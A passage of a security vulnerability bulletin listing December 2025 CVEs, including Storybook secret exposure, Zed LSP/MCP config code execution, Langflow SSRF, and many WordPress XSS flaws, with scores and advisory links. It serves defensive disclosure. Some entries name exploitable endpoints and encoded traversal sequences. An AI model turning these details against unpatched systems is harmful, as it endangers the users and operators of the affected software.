| storybookjs--storybook | Storybook is a frontend workshop for building user interface components and pages in isolation. A vulnerability present starting in versions 7.0.0 and prior to versions 7.6.21, 8.6.15, 9.1.17, and 10.1.10 relates to Storybook's handling of environment variables defined in a `.env` file, which could, in specific circumstances, lead to those variables being unexpectedly bundled into the artifacts created by the `storybook build` command. When a built Storybook is published to the web, the bundle's source is viewable, thus potentially exposing those variables to anyone with access. For a project to potentially be vulnerable to this issue, it must build the Storybook (i.e. run `storybook build` directly or indirectly) in a directory that contains a `.env` file (including variants like `.env.local`) and publish the built Storybook to the web. Storybooks built without a `.env` file at build time are not affected, including common CI-based builds where secrets are provided via platform environment variables rather than `.env` files. Storybook runtime environments (i.e. `storybook dev`) are not affected. Deployed applications that share a repo with your Storybook are not affected. Users should upgrade their Storybook-on both their local machines and CI environment-to version .6.21, 8.6.15, 9.1.17, or 10.1.10 as soon as possible. Maintainers additionally recommend that users audit for any sensitive secrets provided via `.env` files and rotate those keys. Some projects may have been relying on the undocumented behavior at the heart of this issue and will need to change how they reference environment variables after this update. If a project can no longer read necessary environmental variable values, either prefix the variables with `STORYBOOK_` or use the `env` property in Storybook's configuration to manually specify values. In either case, do not include sensitive secrets as they will be included in the built bundle. | 2025-12-17 | 7.3 | CVE-2025-68429 | https://github.com/storybookjs/storybook/security/advisories/GHSA-8452-54wp-rmv6 https://storybook.js.org/blog/security-advisory |
| zed-industries--zed | Zed, a code editor, has an aribtrary code execution vulnerability in versions prior to 0.218.2-pre. The Zed IDE loads Language Server Protocol (LSP) configurations from the `settings.json` file located within a project's `.zed` subdirectory. A malicious LSP configuration can contain arbitrary shell commands that run on the host system with the privileges of the user running the IDE. This can be triggered when a user opens project file for which there is an LSP entry. A concerted effort by an attacker to seed a project settings file (`./zed/settings.json`) with malicious language server configurations could result in arbitrary code execution with the user's privileges if the user opens the project in Zed without reviewing the contents. Version 0.218.2-pre fixes the issue by implementing worktree trust mechanism. As a workaround, users should carefully review the contents of project settings files (`./zed/settings.json`) before opening new projects in Zed. | 2025-12-17 | 7.8 | CVE-2025-68432 | https://github.com/zed-industries/zed/security/advisories/GHSA-29cp-2hmh-hcxj https://zed.dev/blog/secure-by-default |
| zed-industries--zed | Zed, a code editor, has an aribtrary code execution vulnerability in versions prior to 0.218.2-pre. The Zed IDE loads Model Context Protocol (MCP) configurations from the `settings.json` file located within a project's `.zed` subdirectory. A malicious MCP configuration can contain arbitrary shell commands that run on the host system with the privileges of the user running the IDE. This can be triggered automatically without any user interaction besides opening the project in the IDE. Version 0.218.2-pre fixes the issue by implementing worktree trust mechanism. As a workaround, users should carefully review the contents of project settings files (`./zed/settings.json`) before opening new projects in Zed. | 2025-12-17 | 7.8 | CVE-2025-68433 | https://github.com/zed-industries/zed/security/advisories/GHSA-cv6g-cmxc-vw8j https://zed.dev/blog/secure-by-default |
| Ruijie Networks Co., Ltd.--AP180-PE V3.xx | RG - AP180, Indoor Wall Plate Wireless AP AP180 series provided by Ruijie Networks Co., Ltd. contain an OS command injection vulnerability. An arbitrary OS command may be executed on the product by an attacker who logs in to the CLI service. | 2025-12-18 | 7.2 | CVE-2025-68459 | https://www.ruijie.com.cn/gy/xw-aqtg-gw/930282/ https://jvn.jp/en/vu/JVNVU94068946/ |
| Roundcube--Webmail | Roundcube Webmail before 1.5.12 and 1.6 before 1.6.12 is prone to a information disclosure vulnerability in the HTML style sanitizer. | 2025-12-18 | 7.2 | CVE-2025-68460 | https://roundcube.net/news/2025/12/13/security-updates-1.6.12-and-1.5.12 https://github.com/roundcube/roundcubemail/commit/08de250fba731b634bed188bbe18d2f6ef3c7571 |
| Roundcube--Webmail | Roundcube Webmail before 1.5.12 and 1.6 before 1.6.12 is prone to a Cross-Site-Scripting (XSS) vulnerability via the animate tag in an SVG document. | 2025-12-18 | 7.2 | CVE-2025-68461 | https://roundcube.net/news/2025/12/13/security-updates-1.6.12-and-1.5.12 https://github.com/roundcube/roundcubemail/commit/bfa032631c36b900e7444dfa278340b33cbf7cdb |
| langflow-ai--langflow | Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.7.0, Langflow provides an API Request component that can issue arbitrary HTTP requests within a flow. This component takes a user-supplied URL, performs only normalization and basic format checks, and then sends the request using a server-side httpx client. It does not block private IP ranges (127[.]0[.]0[.]1, the 10/172/192 ranges) or cloud metadata endpoints (169[.]254[.]169[.]254), and it returns the response body as the result. Because the flow execution endpoints (/api/v1/run, /api/v1/run/advanced) can be invoked with just an API key, if an attacker can control the API Request URL in a flow, non-blind SSRF is possible-accessing internal resources from the server's network context. This enables requests to, and collection of responses from, internal administrative endpoints, metadata services, and internal databases/services, leading to information disclosure and providing a foothold for further attacks. Version 1.7.0 contains a patch for this issue. | 2025-12-19 | 7.7 | CVE-2025-68477 | https://github.com/langflow-ai/langflow/security/advisories/GHSA-5993-7p27-66g5 |
| langflow-ai--langflow | Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.7.0, if an arbitrary path is specified in the request body's `fs_path`, the server serializes the Flow object into JSON and creates/overwrites a file at that path. There is no path restriction, normalization, or allowed directory enforcement, so absolute paths (e.g., /etc/poc.txt) are interpreted as is. Version 1.7.0 fixes the issue. | 2025-12-19 | 7.1 | CVE-2025-68478 | https://github.com/langflow-ai/langflow/security/advisories/GHSA-f43r-cc68-gpx4 |
| Yealink--RPS | Yealink RPS before 2025-06-27 allows unauthorized access to information, including AutoP URL addresses. This was fixed by deploying an enhanced authentication mechanism through a security update to all cloud instances. | 2025-12-21 | 7.4 | CVE-2025-68644 | https://www.yealink.com/en/trust-center/security-bulletins/yealink-unauthorized-access-to-rps-vulnerability https://www.yealink.com/website-service/download/Yealink_RPS_Security_Remediation_Verification_Report.pdf |
| Utarit Informatics Services Inc.--SoliClub | Use of Hard-coded Credentials vulnerability in Utarit Informatics Services Inc. SoliClub allows Authentication Abuse.This issue affects SoliClub: before 5.3.7. | 2025-12-18 | 7.5 | CVE-2025-7358 | https://www.usom.gov.tr/bildirim/tr-25-0466 |
| JabCareer--WP JobHunt | The WP JobHunt plugin for WordPress, used by the JobCareer theme, is vulnerable to unauthorized modification of data due to a missing capability check on the 'cs_update_application_status_callback' function in all versions up to, and including, 7.7. This makes it possible for authenticated attackers, with Candidate-level access and above, to inject cross-site scripting into the 'status' parameter of applied jobs for any user. | 2025-12-20 | 7.6 | CVE-2025-7782 | https://www.wordfence.com/threat-intel/vulnerabilities/id/af063570-43f7-4bf4-850c-21c3bff40ac1?source=cve https://themeforest.net/item/jobcareer-job-board-responsive-wordpress-theme/14221636 |
| elextensions--ELEX WordPress HelpDesk & Customer Ticketing System | The ELEX WordPress HelpDesk & Customer Ticketing System plugin for WordPress is vulnerable to Stored Cross-Site Scripting via ticket subjects in all versions up to, and including, 3.3.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-21 | 7.2 | CVE-2025-9343 | https://www.wordfence.com/threat-intel/vulnerabilities/id/042d9bc7-50ea-4585-9789-b10ed40b0d14?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3420695%40elex-helpdesk-customer-support-ticket-system&new=3420695%40elex-helpdesk-customer-support-ticket-system&sfp_email=&sfph_mail= |
| Autodesk--Shared Components | A maliciously crafted SLDPRT file, when parsed through certain Autodesk products, can force a Memory corruption vulnerability. A malicious actor can leverage this vulnerability to execute arbitrary code in the context of the current process. | 2025-12-15 | 7.8 | CVE-2025-9452 | https://www.autodesk.com/products/autodesk-access/overview https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0024 |
| Autodesk--Shared Components | A maliciously crafted PRT file, when parsed through certain Autodesk products, can force an Out-of-Bounds Read vulnerability. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process. | 2025-12-15 | 7.8 | CVE-2025-9453 | https://www.autodesk.com/products/autodesk-access/overview https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0024 |
| Autodesk--Shared Components | A maliciously crafted PRT file, when parsed through certain Autodesk products, can force an Out-of-Bounds Read vulnerability. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process. | 2025-12-15 | 7.8 | CVE-2025-9454 | https://www.autodesk.com/products/autodesk-access/overview https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0024 |
| Autodesk--Shared Components | A maliciously crafted CATPRODUCT file, when parsed through certain Autodesk products, can force an Out-of-Bounds Read vulnerability. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process. | 2025-12-15 | 7.8 | CVE-2025-9455 | https://www.autodesk.com/products/autodesk-access/overview https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0024 |
| Autodesk--Shared Components | A maliciously crafted SLDPRT file, when parsed through certain Autodesk products, can force a Memory corruption vulnerability. A malicious actor can leverage this vulnerability to execute arbitrary code in the context of the current process. | 2025-12-15 | 7.8 | CVE-2025-9456 | https://www.autodesk.com/products/autodesk-access/overview https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0024 |
| Autodesk--Shared Components | A maliciously crafted PRT file, when parsed through certain Autodesk products, can force a Memory corruption vulnerability. A malicious actor can leverage this vulnerability to execute arbitrary code in the context of the current process. | 2025-12-15 | 7.8 | CVE-2025-9457 | https://www.autodesk.com/products/autodesk-access/overview https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0024 |
| Autodesk--Shared Components | A maliciously crafted SLDPRT file, when parsed through certain Autodesk products, can force an Out-of-Bounds Read vulnerability. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process. | 2025-12-15 | 7.8 | CVE-2025-9459 | https://www.autodesk.com/products/autodesk-access/overview https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0024 |
| Autodesk--Shared Components | A maliciously crafted SLDPRT file, when parsed through certain Autodesk products, can force an Out-of-Bounds Read vulnerability. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process. | 2025-12-15 | 7.8 | CVE-2025-9460 | https://www.autodesk.com/products/autodesk-access/overview https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0024 |
Medium Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| Kentico--Xperience | A CRLF injection vulnerability in Kentico Xperience allows attackers to manipulate URL query string redirects via improper encoding in the routing engine. This could enable header injection and potentially facilitate further web application attacks. | 2025-12-18 | 6.5 | CVE-2022-50682 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 13.0.79 Routing Engine CRLF Injection |
| Palantir--com.palantir.acme.gaia:gaia | Gotham Gaia application was found to be exposing multiple unauthenticated endpoints. | 2025-12-19 | 6.8 | CVE-2023-30971 | https://palantir.safebase.us/?tcuUid=4d833960-b5a8-4750-abef-9c447fcd89fb |
| websitebaker--WebsiteBaker | WebsiteBaker 2.13.3 contains a directory traversal vulnerability that allows authenticated attackers to delete arbitrary files by manipulating directory path parameters. Attackers can send crafted GET requests to /admin/media/delete.php with directory traversal sequences to delete files outside the intended directory. | 2025-12-16 | 6.5 | CVE-2023-53902 | ExploitDB-51554 WebsiteBaker Product Webpage VulnCheck Advisory: WebsiteBaker 2.13.3 Directory Traversal via Media Delete Endpoint |
| Bludit--Backup Plugin | Bludit versions before 3.13.1 contain an authenticated file download vulnerability in the Backup Plugin that allows logged-in users to access arbitrary files. Attackers can exploit the plugin's download functionality by manipulating file path parameters to read sensitive system files through directory traversal. | 2025-12-17 | 6.5 | CVE-2023-53907 | ExploitDB-51541 Official Product Webpage VulnCheck Advisory: Bludit 3.13.1 Authenticated Arbitrary File Download via Backup Plugin |
| Belden--HiSecOS | HiSecOS 04.0.01 contains a privilege escalation vulnerability that allows authenticated users to modify their access role through XML-based NETCONF configuration. Attackers can send crafted XML payloads to the /mops_data endpoint with a specific role value to elevate their user privileges to administrative level. | 2025-12-17 | 6.5 | CVE-2023-53908 | ExploitDB-51537 Official Product Webpage VulnCheck Advisory: HiSecOS 04.0.01 Privilege Escalation via User Role Modification |
| BiniSoft--USB Flash Drives Control | USB Flash Drives Control 4.1.0.0 contains an unquoted service path vulnerability in its service configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in 'C:\Program Files\USB Flash Drives Control\usbcs.exe' to inject malicious executables and escalate privileges on Windows systems. | 2025-12-17 | 6.2 | CVE-2023-53912 | ExploitDB-51508 Official Product Webpage VulnCheck Advisory: USB Flash Drives Control 4.1.0.0 Unquoted Service Path Privilege Escalation |
| powerstonegh--Affiliate Me | Affiliate Me version 5.0.1 contains a SQL injection vulnerability in the admin.php endpoint that allows authenticated administrators to manipulate database queries. Attackers can exploit the 'id' parameter with crafted union-based queries to extract sensitive user information including usernames and password hashes. | 2025-12-17 | 6.5 | CVE-2023-53917 | ExploitDB-51468 Official Vendor Homepage VulnCheck Advisory: Affiliate Me 5.0.1 SQL Injection Vulnerability via Admin Panel |
| Easyphp--EasyPHP Webserver | EasyPHP Webserver 14.1 contains a path traversal vulnerability that allows remote users with low privileges to access files outside the document root by bypassing SecurityManager restrictions. Attackers can send GET requests with encoded directory traversal sequences like /..%5c..%5c to read system files such as /windows/win.ini. | 2025-12-18 | 6.5 | CVE-2023-53944 | ExploitDB-51430 Official Product Homepage VulnCheck Advisory: EasyPHP Webserver 14.1 Path Traversal via Directory Traversal Sequences |
| Websitebaker--WebsiteBaker | WebsiteBaker 2.13.3 contains a stored cross-site scripting vulnerability that allows authenticated users to inject malicious scripts when creating web pages. Attackers can craft malicious payloads in page titles that execute arbitrary JavaScript when the page is viewed by other users. | 2025-12-19 | 6.4 | CVE-2023-53953 | ExploitDB-51349 Official Product Homepage VulnCheck Advisory: WebsiteBaker 2.13.3 Stored Cross-Site Scripting via Page Creation |
| Actfax--ActFax | ActFax 10.10 contains an unquoted service path vulnerability that allows local attackers to potentially escalate privileges by exploiting the ActiveFaxServiceNT service configuration. Attackers with write permissions to Program Files directories can inject a malicious ActSrvNT.exe executable to gain elevated system access when the service restarts. | 2025-12-19 | 6.2 | CVE-2023-53954 | ExploitDB-51332 Official Product Homepage VulnCheck Advisory: ActFax 10.10 Unquoted Path Services Privilege Escalation Vulnerability |
| Milestone Systems--XProtect VMS | Missing Authorization vulnerability in Milestone Systems XProtect VMS allows users with read-only access to Management Server to have full read/write access to MIP Webhooks API. | 2025-12-16 | 6.3 | CVE-2025-0836 | https://supportcommunity.milestonesys.com/s/article/CVE-2025-0836-XProtect-MIP-API-broken-access-control?language=en_US https://supportcommunity.milestonesys.com/s/article/XProtect-VMS-cumulative-patches-complete-list?language=en_US |
| elemntor--Elementor Website Builder More Than Just a Page Builder | The Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Text Path widget in all versions up to, and including, 3.33.3 due to insufficient neutralization of user-supplied input used to build SVG markup inside the widget. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-16 | 6.4 | CVE-2025-11220 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1a73c078-ce66-4131-8bd7-6fd48fc9fa84?source=cve https://plugins.trac.wordpress.org/changeset/3414494/elementor |
| rustaurius--Five Star Restaurant Reservations WordPress Booking Plugin | The Five Star Restaurant Reservations - WordPress Booking Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'rtb-name' parameter in all versions up to, and including, 2.7.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-21 | 6.1 | CVE-2025-11496 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1889c1ba-f49f-474c-8d0a-0ae46fb92deb?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3408446%40restaurant-reservations&new=3408446%40restaurant-reservations&sfp_email=&sfph_mail= |
| Zohocorp--ManageEngine ADManager Plus | Zohocorp ManageEngine ADManager Plus versions before 8025 are vulnerable to NTLM Hash Exposure. This vulnerability is exploitable only by technicians who have the "Impersonate as Admin" option enabled. | 2025-12-15 | 6.4 | CVE-2025-11670 | https://www.manageengine.com/products/ad-manager/admanager-kb/cve-2025-11670.html |
| extendthemes--Colibri Page Builder | The Colibri Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the colibri_blog_posts shortcode in all versions up to, and including, 1.0.345 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-19 | 6.4 | CVE-2025-11747 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e3305b39-5f7b-493b-80b5-cb925c2710c1?source=cve https://plugins.trac.wordpress.org/browser/colibri-page-builder/trunk/extend-builder/shortcodes/blog-posts.php#L251 https://plugins.trac.wordpress.org/changeset/3421590/colibri-page-builder/trunk/extend-builder/shortcodes/blog-posts.php |
| zephyrproject-rtos--Zephyr | An integer overflow condition exists in Bluetooth Host stack, within the bt_br_acl_recv routine a critical path for processing inbound BR/EDR L2CAP traffic. | 2025-12-15 | 6.5 | CVE-2025-12035 | https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-p793-3456-h7w3 |
| codersaiful--Product Table for WooCommerce | The Product Table for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'search_key' parameter in all versions up to, and including, 5.0.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-21 | 6.1 | CVE-2025-12398 | https://www.wordfence.com/threat-intel/vulnerabilities/id/35790e70-6e96-4ffe-9d4e-828dd649e8c0?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3420662%40woo-product-table&new=3420662%40woo-product-table&sfp_email=&sfph_mail= |
| kaizencoders--Attachments Handler | The Attachments Handler plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via URL in all versions up to, and including, 1.1.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-20 | 6.1 | CVE-2025-12581 | https://www.wordfence.com/threat-intel/vulnerabilities/id/dc948f30-2fc2-40dd-878e-28e0eac857c7?source=cve https://plugins.trac.wordpress.org/browser/attachments-handler/trunk/core/admin_table.class.php#L170 https://wordpress.org/plugins/attachments-handler/ |
| Mattermost--Mattermost | Mattermost versions 11.0.x <= 11.0.4, 10.12.x <= 10.12.2, 10.11.x <= 10.11.6 fail to check WebSocket request field for proper UTF-8 format, which allows attacker to crash Calls plug-in via sending malformed request. | 2025-12-17 | 6.5 | CVE-2025-12689 | https://mattermost.com/security-updates |
| awsmin--Embed Any Document Embed PDF, Word, PowerPoint and Excel Files | The Embed Any Document - Embed PDF, Word, PowerPoint and Excel Files plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the sanitize_pdf_src function regex bypass in all versions up to, and including, 2.7.10 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-18 | 6.4 | CVE-2025-12885 | https://www.wordfence.com/threat-intel/vulnerabilities/id/efbdf0f0-6b38-418c-b3fb-396f89ada34f?source=cve https://plugins.trac.wordpress.org/changeset/3406443/ |
| netweblogic--Events Manager Calendar, Bookings, Tickets, and more! | The Events Manager - Calendar, Bookings, Tickets, and more! plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'events_list_grouped' shortcode in all versions up to, and including, 7.2.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-18 | 6.4 | CVE-2025-12976 | https://www.wordfence.com/threat-intel/vulnerabilities/id/17e853b2-c7ab-478c-9c89-d8e3a42d1a42?source=cve https://plugins.trac.wordpress.org/browser/events-manager/tags/7.2.2.1/em-shortcode.php#L119 https://plugins.trac.wordpress.org/browser/events-manager/tags/7.2.2.1/em-functions.php#L933 https://plugins.trac.wordpress.org/browser/events-manager/tags/7.2.2.1/templates/templates/events-list-grouped.php https://plugins.trac.wordpress.org/browser/events-manager/tags/7.2.2.1/classes/em-events.php#L423 https://plugins.trac.wordpress.org/changeset/3413776/ |
| ultimatemember--Ultimate Member User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin | The Ultimate Member - User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the YouTube Video 'value' field in all versions up to, and including, 2.11.0. This is due to insufficient input sanitization and output escaping on user-supplied YouTube video URLs in the `um_profile_field_filter_hook__youtube_video()` function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that execute whenever a user accesses the injected user's profile page. | 2025-12-17 | 6.4 | CVE-2025-13217 | https://www.wordfence.com/threat-intel/vulnerabilities/id/876b57e0-cf1e-4ce9-ba85-a5d4554797bd?source=cve https://plugins.trac.wordpress.org/browser/ultimate-member/trunk/includes/core/um-filters-fields.php#L80 https://plugins.trac.wordpress.org/changeset/3421362/ |
| ultimatemember--Ultimate Member User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin | The Ultimate Member - User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode attributes in all versions up to, and including, 2.11.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-21 | 6.4 | CVE-2025-13220 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b4c06548-238d-4b75-8f20-d7de6fc21539?source=cve https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.10.6/includes/core/class-shortcodes.php#L67 https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.10.6/includes/core/class-shortcodes.php#L525 https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.10.6/includes/core/class-shortcodes.php#L558 https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.10.6/includes/core/class-shortcodes.php#L591 https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.10.6/includes/core/class-shortcodes.php#L625 https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.10.6/includes/core/class-shortcodes.php#L542 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3421362%40ultimate-member&new=3421362%40ultimate-member&sfp_email=&sfph_mail= |
| radykal--Fancy Product Designer | The Fancy Product Designer plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 6.4.8. This is due to a time-of-check/time-of-use (TOCTOU) race condition in the 'url' parameter of the fpd_custom_uplod_file AJAX action. The plugin validates the URL by calling getimagesize() first, then later retrieves the same URL using file_get_contents(). This makes it possible for unauthenticated attackers to exploit the timing gap to perform SSRF attacks by serving a valid image during validation, then changing the response to redirect to arbitrary internal or external URLs during the actual fetch. | 2025-12-16 | 6.5 | CVE-2025-13231 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c56ec6ae-5b75-4cbb-aedd-f318fddc7bf0?source=cve https://support.fancyproductdesigner.com/support/discussions/topics/13000036024 |
| tikolan--WP Hallo Welt | The WP Hallo Welt plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4. This is due to missing or incorrect nonce validation on the 'hallo_welt_seite' function. This makes it possible for unauthenticated attackers to update plugin settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Due to the insufficient input sanitization and output escaping, this can lead to Stored Cross-Site Scripting. | 2025-12-20 | 6.1 | CVE-2025-13365 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e422aa58-a335-4734-bbcd-d400bd44bc89?source=cve https://plugins.trac.wordpress.org/browser/wp-hallo-welt/trunk/hallowelt.php#L53 https://plugins.trac.wordpress.org/browser/wp-hallo-welt/tags/1.4./hallowelt.php#L53 https://plugins.trac.wordpress.org/browser/wp-hallo-welt/trunk/hallowelt.php#L54 https://plugins.trac.wordpress.org/browser/wp-hallo-welt/trunk/hallowelt.php#L66 https://plugins.trac.wordpress.org/browser/wp-hallo-welt/trunk/hallowelt.php#L15 https://plugins.trac.wordpress.org/browser/wp-hallo-welt/trunk/hallowelt.php#L27 |
| wpeverest--User Registration & Membership Custom Registration Form Builder, Custom Login Form, User Profile, Content Restriction & Membership Plugin | The User Registration & Membership - Custom Registration Form Builder, Custom Login Form, User Profile, Content Restriction & Membership Plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple shortcode attributes in all versions up to, and including, 4.4.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-15 | 6.4 | CVE-2025-13367 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2244945a-5b3a-463d-9910-46a6f7afaf6c?source=cve https://plugins.trac.wordpress.org/changeset/3412096/user-registration/trunk/modules/membership/includes/Templates/membership-listing.php https://plugins.trac.wordpress.org/changeset/3412096/user-registration/trunk/modules/membership/includes/Templates/thank-you-page.php |
| Fortra--Core Privileged Access Manager (BoKS) | Insecure defaults in the Server Agent component of Fortra's Core Privileged Access Manager (BoKS) can result in the selection of weak password hash algorithms. This issue affects BoKS Server Agent 9.0 instances that support yescrypt and are running in a BoKS 8.1 domain. | 2025-12-16 | 6.2 | CVE-2025-13532 | https://www.fortra.com/security/advisories/product-security/fi-2025-014 |
| livecomposer--Live Composer Free WordPress Website Builder | The Live Composer - Free WordPress Website Builder plugin for WordPress is vulnerable to multiple Stored Cross-Site Scripting vulnerabilities via DOM manipulation in all versions up to, and including, 2.0.2 due to insufficient input sanitization and output escaping on user-supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-17 | 6.4 | CVE-2025-13537 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a9f8ab73-8c2a-4551-bad9-4e5cc67231e5?source=cve https://plugins.trac.wordpress.org/browser/live-composer-page-builder/trunk/js/src/client/frontend/index.js#L126 https://plugins.trac.wordpress.org/browser/live-composer-page-builder/trunk/js/src/client/frontend/index.js#L926 https://plugins.trac.wordpress.org/changeset/3419715/ |
| caterhamcomputing--CC Child Pages | The CC Child Pages plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'child_pages' shortcode in all versions up to, and including, 2.0.0. This is due to insufficient input sanitization and output escaping on four user-supplied attributes (use_custom_link, use_custom_link_target, use_custom_thumbs, and use_custom_excerpt) in the 'show_child_pages' function. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-15 | 6.4 | CVE-2025-13608 | https://www.wordfence.com/threat-intel/vulnerabilities/id/139009b5-69d4-44ca-820c-766645828e5e?source=cve https://plugins.trac.wordpress.org/changeset/3403877/cc-child-pages |
| metagauss--RegistrationMagic Custom Registration Forms, User Registration, Payment, and User Login | The RegistrationMagic - Custom Registration Forms, User Registration, Payment, and User Login plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'RM_Forms' shortcode in all versions up to, and including, 6.0.6.7 due to insufficient input sanitization and output escaping on the 'theme' attribute. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-15 | 6.4 | CVE-2025-13610 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4be512bd-190a-415a-bd20-a49373f63fbb?source=cve https://plugins.trac.wordpress.org/changeset/3414853/custom-registration-form-builder-with-submission-manager |
| travishoki--Overstock Affiliate Links | The Overstock Affiliate Links plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` parameter in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-20 | 6.1 | CVE-2025-13624 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c06207da-d15d-4540-84be-218fa9055fd5?source=cve https://wordpress.org/plugins/overstock-affiliate-links/ https://plugins.trac.wordpress.org/browser/overstock-affiliate-links/trunk/sandbox_page.php#L18 https://plugins.trac.wordpress.org/browser/overstock-affiliate-links/tags/1.1/sandbox_page.php#L18 |
| wpchill--Image Photo Gallery Final Tiles Grid | The Image Photo Gallery Final Tiles Grid plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Custom scripts' setting in all versions up to, and including, 3.6.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-21 | 6.4 | CVE-2025-13693 | https://www.wordfence.com/threat-intel/vulnerabilities/id/625d2b09-a6b9-4c0c-8c36-3c565e688aac?source=cve https://plugins.trac.wordpress.org/browser/final-tiles-grid-gallery-lite/trunk/lib/gallery-class.php#L126 https://plugins.trac.wordpress.org/browser/final-tiles-grid-gallery-lite/tags/3.6.6/lib/gallery-class.php#L126 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3418337%40final-tiles-grid-gallery-lite&new=3418337%40final-tiles-grid-gallery-lite&sfp_email=&sfph_mail= |
